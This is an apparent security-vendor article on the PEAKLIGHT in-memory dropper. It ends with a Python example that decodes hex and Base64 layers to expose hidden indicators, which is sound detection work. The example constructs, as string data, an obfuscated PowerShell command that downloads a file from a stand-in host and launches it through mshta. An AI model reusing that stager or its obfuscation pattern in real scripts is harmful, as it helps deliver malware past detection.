Threat Analysis: Morphisec Protects Against PEAKLIGHT In-Memory Malware
Recent reports from Mandiant and Morphisec analyze PEAKLIGHT, a memory-only dropper that targets Windows systems. It is distributed in malicious ZIP archives posing as pirated movies and starts a multi-stage infection chain that relies on evasion techniques such as CDN abuse (staging follow-on payloads on legitimate content delivery networks) and system binary proxy execution (launching payloads through trusted, signed Windows utilities).

The chain begins with an LNK shortcut inside the ZIP archive. Opening it retrieves the next stage from a CDN and runs it without writing it to disk, which is what makes the dropper memory-only. PEAKLIGHT itself is a PowerShell downloader: it checks predefined directories for the payload archives it expects, fetches them from remote servers only when they are absent, and then launches them. The follow-on payloads observed include LUMMAC.V2, SHADOWLADDER, and CRYPTBOT. The scripts are heavily obfuscated, chiefly through hexadecimal and Base64 encoding of strings and commands, so the real logic only appears once those layers are decoded at run time.

Both firms have published detection aids, including YARA rules, and recommend keeping security software up to date and treating downloads of pirated content with suspicion. The emergence of PEAKLIGHT underlines the need for robust defenses and for sharing analysis within the security community.
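The two encodings named above, hexadecimal and Base64, are worth seeing peeled apart in code. The following Python is an added example written for this page, not code from Mandiant, Morphisec, or the PEAKLIGHT samples: it builds a small hypothetical PowerShell stager (made-up host cdn.example.invalid and a made-up path under C:\Users\Public) obfuscated the same two ways, then decodes the -EncodedCommand blob and the hex string runs and reports which indicators surface. The indicator list is an assumption for the example, not a published rule.

```python
import base64
import re

# Strings worth surfacing once the encoding layers are peeled away. The comments
# tie each one to the behaviour described above; this list is an analyst's choice
# for the example, not something published by Mandiant or Morphisec.
INDICATORS = [
    "ToInt32",            # runtime hex-to-character conversion (the decoder itself)
    "Test-Path",          # presence check on a predefined path before downloading
    "DownloadFile",       # WebClient retrieval of a follow-on payload
    "Invoke-Expression",  # in-memory execution of script text
    "mshta",              # system binary proxy execution via a signed Windows utility
]

# Made-up values for the constructed sample (assumptions, not observed IOCs).
STAGE_PATH = r"C:\Users\Public\stage2.zip"
STAGE_URL = "https://cdn.example.invalid/stage2.zip"

HEX_RUN = re.compile(r"'([0-9a-fA-F]{8,})'")                       # quoted hex byte runs
ENC_CMD = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
URL = re.compile(r"https?://[^\s'\"()]+")


def hex_encode(text: str) -> str:
    """Hide a literal as a run of hex byte values (the obfuscator's side)."""
    return text.encode("ascii").hex()


def build_sample() -> str:
    """Construct the obfuscated stager used in this example.

    Hypothetical PowerShell: sensitive strings are hex runs that the $h helper
    turns back into text at run time, and the whole script is shipped as a
    UTF-16LE Base64 blob on the -EncodedCommand switch.
    """
    inner = (
        "$h={param($x)-join((($x -split '(..)')|?{$_})|%{[char][Convert]::ToInt32($_,16)})};\n"
        f"$d=&$h '{hex_encode(STAGE_PATH)}';\n"
        f"$u=&$h '{hex_encode(STAGE_URL)}';\n"
        f"if(-not(&(&$h '{hex_encode('Test-Path')}') $d))"
        f"{{(New-Object Net.WebClient).(&$h '{hex_encode('DownloadFile')}')($u,$d)}};\n"
        f"&(&$h '{hex_encode('Invoke-Expression')}') ((&$h '{hex_encode('mshta')}')+' '+$d)\n"
    )
    blob = base64.b64encode(inner.encode("utf-16-le")).decode("ascii")
    return f"powershell.exe -NoP -W Hidden -EncodedCommand {blob}"


def decode_encoded_command(cmdline: str):
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent."""
    m = ENC_CMD.search(cmdline)
    if m is None:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def decode_hex_runs(script: str) -> str:
    """Replace each quoted hex run with its text when every byte is printable ASCII."""
    def repl(m: re.Match) -> str:
        run = m.group(1)
        if len(run) % 2:
            return m.group(0)
        raw = bytes.fromhex(run)
        if all(0x20 <= b < 0x7F for b in raw):
            return "'" + raw.decode("ascii") + "'"
        return m.group(0)
    return HEX_RUN.sub(repl, script)


def deobfuscate(cmdline: str) -> dict:
    """Peel the Base64 layer, then hex layers, and report indicators and URLs."""
    layers = [cmdline]
    inner = decode_encoded_command(cmdline)
    if inner is not None:
        layers.append(inner)
    # A hex run may itself decode to further hex runs, so repeat until stable.
    for _ in range(8):
        nxt = decode_hex_runs(layers[-1])
        if nxt == layers[-1]:
            break
        layers.append(nxt)
    plain = layers[-1]
    return {
        "layers": layers,
        "indicators": [i for i in INDICATORS if i.lower() in plain.lower()],
        "urls": URL.findall(plain),
        "plaintext": plain,
    }


if __name__ == "__main__":
    report = deobfuscate(build_sample())
    print("layers peeled:", len(report["layers"]) - 1)
    print("indicators:", report["indicators"])
    print("urls:", report["urls"])
    print(report["plaintext"])
```

Running the script prints the recovered plaintext with the path check, the download call and the proxy-execution call in the clear. None of those strings exist in the command line as delivered, which is why string-based rules fire late or not at all against this class of dropper: a decode step like this, or PowerShell script-block logging that records the de-encoded script, has to sit in front of the matching.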